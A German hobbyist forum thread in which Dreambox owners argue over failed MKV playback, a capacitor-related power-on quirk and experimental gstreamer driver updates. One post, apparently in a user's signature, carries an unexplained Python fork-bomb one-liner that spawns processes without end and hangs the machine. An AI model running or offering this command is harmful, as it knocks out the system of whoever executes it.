Immer wieder Probleme mit MKV Datein.....

• Hi,

Original von Freaky
      Was nutzen tolle meist total sinnlose Plugins und die sinnloseste Erfindung die Picons wenn die Boxen Hardware- und Softwaremäßig der letzte Schrott sind.
      Zudem, was nutzt es wenn eine Box fast alles kann, aber nichts richtig.

OK, deine Ausdrucksweise sagt mit, dass es keinen Sinn hat sich mit dir über Dreambox zu unterhalten. Für mich tun die Boxen (hatte eine DM7025 und DM800) zu mindestens 95% ALLES was ich mir wünsche. Dazu gibt sie mir noch ein supertolles Hobby...

Versteh überhaupt nicht wieso du dich hier in diesem Forum aktiv beteiligst. Es ist doch bestimmt nicht so, dass du anderen nur das Hobby schlecht machen willst?

romeo-golf
    • Original von Solaris
      Hallo OdinZ,

Super was Du da schreibst nur waren die Finger mal wieder schneller asl der Verstand...

Original von OdinZ
      Ich persönlich finde es eine frechheit vom Hersteller was zu verkaufen was nicht funktioniert wenn das zur normalität wird seh ich schwarz für bestimmte Hersteller.

Wo steht denn dass die DM800 und DM8000 Offiziell MKV Supportet ich lese auf beiden Technischen beschreibungen von DreamMultimedia kein Wort darüber!

Technische Daten DM800
      Technische Daten DM8000

Nur weil so ein zweitklass Magazin das mal geschrieben hat, oder es in einem anderen Forum gepostet worden ist heisst es noch lange nicht dass es die Box zu 100% kann. Es kann sein dass es irgendeinmal kommt aber bis Dato ist es Alpha gegebenenfalls Beta aber nicht Stable.

Gruss aus der Schweiz

Solaris

Es gehtt ja nicht nur um MKV datein es hat ja noch etliche andere krankheiten zb meine 800er wenn man sie austellt nicht sofort wieder angeht Hardware fehler denk ich mal stell dir vor es würde ein Auto Hersteller dir ein Auto liefern was nur auf dem schönen glanzprospekt komplett ist und man bekommt was unfertiges.
      Soll ja nicht heissen das ich mir nie wieder eine Dream kaufen würde ich finde ja nur das es so nicht okay ist ................
      Posting © [OdinZ] 2008. Alle Rechte vorbehalten. Kein Verwenden, Zitieren und Kritisieren ohne Erlaubnis. =)
    • Hi,

Original von OdinZ
      Es gehtt ja nicht nur um MKV datein es hat ja noch etliche andere krankheiten zb meine 800er wenn man sie austellt nicht sofort wieder angeht Hardware fehler

wenn du dich ein wenig in den Foren umgesehen hättest wüßtest du, dass dieser "Fehler" daher rührt das ein Kondensator sich nicht schnell genug entleert. Entweder man geduldet sich ein paar Augenblicke, ist sauschnell (beim aus- und einschalten) oder traut sich ein Wiederstand einzulöten (Garantieverlust(?).

Nur deshalb die DM800 zu verteufeln (hast du nicht gemacht) zeugt davon, dass man sich eben unzureichend informiert hat. Sehr, sehr viele "Fehler" sind hausgemacht, es werden alte Settings in neue Images kopiert oder duzende Plugin in- und wieder deinstalliert. Wer zuerst einmal ein sogenanntes CVS Image nimmt und nur die Kernfunktionen testet wird feststellen: das kann die DM800 "nahezu" perfekt.

Was mich an deinem Beitrag stört ist das Wort "etliche". Bitte nicht pauschal sondern explizit: was kann deine DM800 nicht? mkv's, das haben wir schon gelesen, wurden nie angekündigt. Den Kondensator als Hardwarefehler/Krankheit zu definieren?

romeo-golf
    • Hallo OdinZ,

Nett zu lesen dass Du nun eine Dreambox mit einem Auto vergleichst, aber ich gehe gerne auf dein Beispiel ein.

Original von OdinZ
      Es gehtt ja nicht nur um MKV datein es hat ja noch etliche andere krankheiten zb meine 800er wenn man sie austellt nicht sofort wieder angeht Hardware fehler denk ich mal stell dir vor es würde ein Auto Hersteller dir ein Auto liefern was nur auf dem schönen glanzprospekt komplett ist und man bekommt was unfertiges.
      Soll ja nicht heissen das ich mir nie wieder eine Dream kaufen würde ich finde ja nur das es so nicht okay ist ................

Mit anderen Worten Du stellst dein Auto auch ab und gleich wieder an, ob dass dann deinem Auto und der Elektronik gut tut lassen wir nun mal dahin gestellt. Jeder der etwas Ahnung hat von Elektronik weiss dass man zwischen dem Aus und Einschalten ca. 10 Sekunden warten sollte. Dann kommt dein sogeganter Hardware Fehler auch nicht vor. Du kannst gerne hier im Forum fragen ich habe diverse Dreamboxen um nun nicht anzugeben, aber ich habe von jeder Box mindestens ein Exemplar von gewissen sogar mehree Stück. Die einzigen Problem Boxen sind die 5620er und ihre Kondensatoren sowie das Netzteil der 7025er Serie. Aber diese Probleme habe ich nun selber behoben so dass alle meine Boxen im Einsatz sind.

Gruss aus der Schweiz

Marcel
      Wahres Wissen beruht auf Erfahrung, alles andere ist nur Information.
      (Albert Einstein)

Μπορώ να ζήσω στην Ελβετία αλλά στο δεοξυριβονουκλεϊκό οξύ μου είναι η κυπρος της επαρχίας Αμμοχώστου

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Solaris ()

• Original von romeo-golf
      Versteh überhaupt nicht wieso du dich hier in diesem Forum aktiv beteiligst. Es ist doch bestimmt nicht so, dass du anderen nur das Hobby schlecht machen willst?

romeo-golf

Die Leute sollen einfach mal die Augen aufmachen was da für ein Schrott produziert wird und mit jeder neuen Box wird es schlimmer.
      Als ich noch daran glaubte das Bugs wirklich im Laufe der Zeit gefixt werden, habe ich die Dream auch noch als toll empfunden.

Gekauft wurde der Schrott nur unter dem Aspekt, das mit der Dream die Bastelei der dbox2 endlich ein Ende hat und man sich nur noch seinen Teil der Software selber machen muss den man auch will. Bei der fehlerhaften Hard- und Software ist das schlicht unmöglich Spass daran zu finden, dmm auch noch den Mist weiter zu entwickeln. Aus und Ende. :rolleyes:
    • treiberupdate

Veruschst doch einfach mal mit men Update von dvb-modules und dem gstreamer.
      Hab zwar das gemini 4.3 bei mir drauf, aber bei mir hats was gebracht. MKVs lassen sich problemlos abspielen und laufen flüssig und das Bild ist auch nicht mehr gezoomt mit den "Eierköpfen".
      Generell sollte ja das enigma-image die gleichen treiber verwenden.

hier mal ein link:
      h**p://dreamboxupdate.com/opendreambox/1.5/dm800/experimental/
      hab dort die Treiber geholt:
      gstreamer_0.10.23.1-r2_mipsel.ipk
      und diesen da:
      dreambox-dvb-modules_2.6.12-5.1-brcmstb-dm800-20090707-r0_dm800.ipk

Diese Dateien in den tmp-ordner rein und einfach über Dateimanager installieren, Dox neustarten und danach die mkvs geniesen ;)

Hoffe doch dass die Links, die ich hier gepostet hab, in Ordnung sind.

greets
      pablo
    • Wie wäre es auf die Version 2.6 zu warten ????

oder ihr testet mal die entsprechenden Treiber aus dem feed.

Schimpfen kann jeder .. besser machen nur wenige .. daher erfreut euch über das was geht und schimpft nicht so viel :)

In diesem Sinne --- frohes Testen !!
    • Da brauch man auf kein 2.6 warten. 8)

Wie soll man es besser machen wenn die Jungs von dmm die Treibersourcen nicht rausrücken? Man ist doch auf dmm angewiesen, sonst wären viele Sachen schon lange gefixt.
    • Hi,

Original von Freaky
      Aus und Ende. :rolleyes:

schade... leider machst du es auch nicht besser als DMM. Bitte... halte wenigstens du das ein was du versprichst (ohne Smily).

Durch dein dauerndes genörgel wird die Box auch nicht besser; oder warum schreibst du das nicht in dem offiziellen Board wo es hingehören würde?

romeo-golf
    • Original von Freaky
      Da brauch man auf kein 2.6 warten. 8)

Wie soll man es besser machen wenn die Jungs von dmm die Treibersourcen nicht rausrücken? Man ist doch auf dmm angewiesen, sonst wären viele Sachen schon lange gefixt.

mkv abspielen sind nicht die treiber sondern der gstreamer und da hat sich einiges getan 8)
      » time to say goodbye «

Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • RE: treiberupdate

Originally posted by pablo123
      Veruschst doch einfach mal mit men Update von dvb-modules und dem gstreamer.
      Hab zwar das gemini 4.3 bei mir drauf, aber bei mir hats was gebracht. MKVs lassen sich problemlos abspielen und laufen flüssig und das Bild ist auch nicht mehr gezoomt mit den "Eierköpfen".
      Generell sollte ja das enigma-image die gleichen treiber verwenden.

hier mal ein link:
      h**p://dreamboxupdate.com/opendreambox/1.5/dm800/experimental/
      hab dort die Treiber geholt:
      gstreamer_0.10.23.1-r2_mipsel.ipk
      und diesen da:
      dreambox-dvb-modules_2.6.12-5.1-brcmstb-dm800-20090707-r0_dm800.ipk

Diese Dateien in den tmp-ordner rein und einfach über Dateimanager installieren, Dox neustarten und danach die mkvs geniesen ;)

Hoffe doch dass die Links, die ich hier gepostet hab, in Ordnung sind.

greets
      pablo

Wie finde ich heraus welche version von gstreamer bereits installiert ist,habe die neueste Oozoon installiert.

Den gstreamer alleine zu installieren bringt gar nichts wenn ihr die gstreamer plugins vergesst.Ich rate euch davon ab sowas zusammen zu frickeln wartet es ab bis das update kommt da sind viele änderungen drinn von dmm.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !

Hi,

Original von nixkoenner
      /me schweigt jetzt dazu :D :D 8) :D :D 8)

logisch, hast ja auch keine Zeit dazu. :D

Musst schließlich die 2.6 fertig bekommen...

romeo-golf
      PS: um beim Topic zu bleiben. Mit dem aktuellen OoZooN klappt es auch mit den mkvs. Also wird es mit der neuen Newnigma2 Version auch funktionieren
    • Ich bin "Opfer" einer Octagon 918 SF, lest da mal was die alles können kann und was die tatsächlich zu Werke bringt: Nicht annähernd das was versprochen wird!!! Und an der Soft wird mehr verschlimmbessert als das sie besser wird, soviel mal zum Developement von Software....

Ich teste jetzt mal dies ts-Muxer und schau mir das Ergebnis an. Bloß weil die oder besser einige mkv's nicht gehen, von schlechter Box zu reden, finde ich übertrieben! Die Kiste kann so gut wie alles was ich wollte und das einwandfrei. Das Einzige was vielleicht ein wenig Kritik bedarf, ist das minimal das bild schlechter ist als von der 918er aber ich denke auch da wird die Entwicklung weiter gehen